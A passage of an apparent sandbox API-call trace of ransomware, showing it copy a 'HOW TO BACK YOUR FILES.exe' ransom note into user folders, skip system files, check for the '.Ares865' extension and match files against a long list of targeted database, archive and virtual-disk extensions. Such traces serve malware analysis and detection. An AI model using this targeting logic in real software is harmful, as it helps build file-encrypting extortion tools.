cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.112] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.113] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0060.113] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\My Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Pictures") returned="C:\\Users\\Default User\\My Documents\\My Pictures" [0060.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0060.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0060.113] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Pictures") returned 46 [0060.113] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Pictures" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Pictures") returned="C:\\Users\\Default User\\My Documents\\My Pictures" [0060.113] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.113] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.113] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.113] GetLastError () returned 0x0 [0060.114] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.114] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.114] CloseHandle (hObject=0x12c) returned 1 [0060.114] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.114] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.114] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x55508260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55508260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.114] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.114] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.114] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.114] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x55508260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55508260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.114] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.114] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.114] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.114] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.114] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x55508260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0060.114] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0060.115] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0060.115] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.115] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Pictures\\*") returned 48 [0060.115] lstrcpyW (in: lpString1=0x2cce45e, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0060.115] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.115] lstrlenW (lpString="Ares865") returned 7 [0060.115] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0060.115] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.115] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.115] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.115] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.115] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0060.115] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\My Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Music") returned="C:\\Users\\Default User\\My Documents\\My Music" [0060.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0060.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0060.115] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Music") returned 43 [0060.115] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Music" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Music") returned="C:\\Users\\Default User\\My Documents\\My Music" [0060.115] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.115] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.116] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.116] GetLastError () returned 0x0 [0060.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.116] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.116] CloseHandle (hObject=0x12c) returned 1 [0060.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.116] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.116] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.117] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.117] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.117] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.117] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.117] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.117] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.117] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.117] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.117] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.117] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.117] lstrlenW (lpString="desktop.ini") returned 11 [0060.117] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Music\\*") returned 45 [0060.117] lstrcpyW (in: lpString1=0x2cce458, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.118] lstrlenW (lpString="desktop.ini") returned 11 [0060.118] lstrlenW (lpString="Ares865") returned 7 [0060.118] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.118] lstrlenW (lpString=".dll") returned 4 [0060.118] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.118] lstrlenW (lpString=".lnk") returned 4 [0060.118] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.118] lstrlenW (lpString=".ini") returned 4 [0060.118] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.118] lstrlenW (lpString=".sys") returned 4 [0060.118] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.118] lstrlenW (lpString="desktop.ini") returned 11 [0060.118] lstrlenW (lpString="bak") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.118] lstrlenW (lpString="ba_") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.118] lstrlenW (lpString="dbb") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.118] lstrlenW (lpString="vmdk") returned 4 [0060.118] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.118] lstrlenW (lpString="rar") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.118] lstrlenW (lpString="zip") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.118] lstrlenW (lpString="tgz") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.118] lstrlenW (lpString="vbox") returned 4 [0060.118] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.118] lstrlenW (lpString="vdi") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.118] lstrlenW (lpString="vhd") returned 3 [0060.118] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.118] lstrlenW (lpString="vhdx") returned 4 [0060.118] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.118] lstrlenW (lpString="avhd") returned 4 [0060.118] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.118] lstrlenW (lpString="db") returned 2 [0060.118] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.119] lstrlenW (lpString="db2") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.119] lstrlenW (lpString="db3") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.119] lstrlenW (lpString="dbf") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.119] lstrlenW (lpString="mdf") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.119] lstrlenW (lpString="mdb") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.119] lstrlenW (lpString="sql") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.119] lstrlenW (lpString="sqlite") returned 6 [0060.119] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.119] lstrlenW (lpString="sqlite3") returned 7 [0060.119] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.119] lstrlenW (lpString="sqlitedb") returned 8 [0060.119] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.119] lstrlenW (lpString="xml") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.119] lstrlenW (lpString="$er") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.119] lstrlenW (lpString="4dd") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.119] lstrlenW (lpString="4dl") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.119] lstrlenW (lpString="^^^") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.119] lstrlenW (lpString="abs") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.119] lstrlenW (lpString="abx") returned 3 [0060.119] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.119] lstrlenW (lpString="accdb") returned 5 [0060.119] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.119] lstrlenW (lpString="accdc") returned 5 [0060.119] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.119] lstrlenW (lpString="accde") returned 5 [0060.119] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.120] lstrlenW (lpString="accdr") returned 5 [0060.120] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.120] lstrlenW (lpString="accdt") returned 5 [0060.120] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.120] lstrlenW (lpString="accdw") returned 5 [0060.120] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.120] lstrlenW (lpString="accft") returned 5 [0060.120] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.120] lstrlenW (lpString="adb") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.120] lstrlenW (lpString="adb") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.120] lstrlenW (lpString="ade") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.120] lstrlenW (lpString="adf") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.120] lstrlenW (lpString="adn") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.120] lstrlenW (lpString="adp") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.120] lstrlenW (lpString="alf") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.120] lstrlenW (lpString="ask") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.120] lstrlenW (lpString="btr") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.120] lstrlenW (lpString="cat") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.120] lstrlenW (lpString="cdb") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.120] lstrlenW (lpString="ckp") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.120] lstrlenW (lpString="cma") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.120] lstrlenW (lpString="cpd") returned 3 [0060.120] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.120] lstrlenW (lpString="dacpac") returned 6 [0060.120] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.120] lstrlenW (lpString="dad") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.121] lstrlenW (lpString="dadiagrams") returned 10 [0060.121] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.121] lstrlenW (lpString="daschema") returned 8 [0060.121] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.121] lstrlenW (lpString="db-journal") returned 10 [0060.121] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.121] lstrlenW (lpString="db-shm") returned 6 [0060.121] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.121] lstrlenW (lpString="db-wal") returned 6 [0060.121] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.121] lstrlenW (lpString="dbc") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.121] lstrlenW (lpString="dbs") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.121] lstrlenW (lpString="dbt") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.121] lstrlenW (lpString="dbv") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.121] lstrlenW (lpString="dbx") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.121] lstrlenW (lpString="dcb") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.121] lstrlenW (lpString="dct") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.121] lstrlenW (lpString="dcx") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.121] lstrlenW (lpString="ddl") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.121] lstrlenW (lpString="dlis") returned 4 [0060.121] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.121] lstrlenW (lpString="dp1") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.121] lstrlenW (lpString="dqy") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.121] lstrlenW (lpString="dsk") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.121] lstrlenW (lpString="dsn") returned 3 [0060.121] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.122] lstrlenW (lpString="dtsx") returned 4 [0060.122] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.122] lstrlenW (lpString="dxl") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.122] lstrlenW (lpString="eco") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.122] lstrlenW (lpString="ecx") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.122] lstrlenW (lpString="edb") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.122] lstrlenW (lpString="epim") returned 4 [0060.122] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.122] lstrlenW (lpString="fcd") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.122] lstrlenW (lpString="fdb") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.122] lstrlenW (lpString="fic") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.122] lstrlenW (lpString="flexolibrary") returned 12 [0060.122] lstrlenW (lpString="fm5") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.122] lstrlenW (lpString="fmp") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.122] lstrlenW (lpString="fmp12") returned 5 [0060.122] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.122] lstrlenW (lpString="fmpsl") returned 5 [0060.122] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.122] lstrlenW (lpString="fol") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.122] lstrlenW (lpString="fp3") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.122] lstrlenW (lpString="fp4") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.122] lstrlenW (lpString="fp5") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.122] lstrlenW (lpString="fp7") returned 3 [0060.122] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.122] lstrlenW (lpString="fpt") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.123] lstrlenW (lpString="frm") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.123] lstrlenW (lpString="gdb") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.123] lstrlenW (lpString="gdb") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.123] lstrlenW (lpString="grdb") returned 4 [0060.123] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.123] lstrlenW (lpString="gwi") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.123] lstrlenW (lpString="hdb") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.123] lstrlenW (lpString="his") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.123] lstrlenW (lpString="ib") returned 2 [0060.123] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.123] lstrlenW (lpString="idb") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.123] lstrlenW (lpString="ihx") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.123] lstrlenW (lpString="itdb") returned 4 [0060.123] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.123] lstrlenW (lpString="itw") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.123] lstrlenW (lpString="jet") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.123] lstrlenW (lpString="jtx") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.123] lstrlenW (lpString="kdb") returned 3 [0060.123] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.123] lstrlenW (lpString="kexi") returned 4 [0060.123] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.123] lstrlenW (lpString="kexic") returned 5 [0060.123] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.123] lstrlenW (lpString="kexis") returned 5 [0060.123] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.123] lstrlenW (lpString="lgc") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.124] lstrlenW (lpString="lwx") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="lwx") returned 